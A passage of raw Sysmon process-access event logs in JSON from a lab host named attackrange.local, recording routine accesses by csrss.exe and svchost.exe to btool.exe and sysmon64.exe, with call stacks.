0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001088360500}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 